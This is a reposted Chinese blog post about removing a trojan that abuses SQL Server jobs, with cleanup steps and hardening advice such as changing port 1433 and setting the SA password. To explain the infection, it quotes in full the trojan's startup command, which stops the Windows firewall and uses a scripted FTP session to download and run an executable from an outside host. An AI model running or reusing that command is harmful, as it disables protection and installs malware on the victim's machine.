原文 http://myeblog.3322.org/1215.html
1、这个是有一个木马造成的。
你看一下,c:/windows/system32下是否有多个64K的xml文件(转载备注:我搜到一个叫sysS.xml的文件,用ue打开却是一个改了扩展名的access文件,前面有Standard Jet DB字样),还有一个隐藏的wsynalib.exe,服务里还会有一个叫Windows System Active的。
处理方法,是先删除wsynalib.exe和多个64k的xml文件,再删c:\windows\system32下isql文件夹,之后修改注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor下AutoRun 的选项为空,然后再删掉服务Windows System Active
2、
一般出这个问题的都是拨号上网的电脑,而路由上网的电脑基本没有这个问题,办法如下
1:重新格式化C盘以及安装SQL的分区
2:安装系统,并开启WINDOWS防火墙(此时你就能看出WINDOWS防火墙的功能不是360能够替代的,那就是端口的监控和防御)
3:安装SQL并将SQL的默认1433端口修改成其它(这一步应该是最重要的)
4:设定系统密码和SA密码
问题解决,这是经过很多次的验证的,本身这是个木马,杀毒软件没有一个能查出来,查出来的都是这个木马下载下来的病毒,让你们看一下这个木马开机执行的命令,是个CMD命令 ,一般你开机看到有个DOS命令执行一下就消失了,一般都是类似的东西在作怪
c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open daoke3322.3322.org> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get cao.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&cao.exe&cao.exe&del cmd.txt
解释一下就是停止WINDOWS防火墙服务,然后从指定的地址下载病毒,然后删除日志
转载后记:我电脑上的也出现了一个作业,显示创建日期是2010.12月。也没太注意这个事情。估计某个时间上网中了木马。杀毒软件或许已经清理了病毒文件。所以按以上处理,无法对应。不过我想,这个病毒会有很多版本和变种。他们的共同特征就是在sql中创建作业并恶意下载病毒文件。他的主程序是一般的正常程序,只是从远程下载的文件是病毒。如果有实时的防病毒,应该问题不大。没漏洞就不叫软件了,真是防不慎防。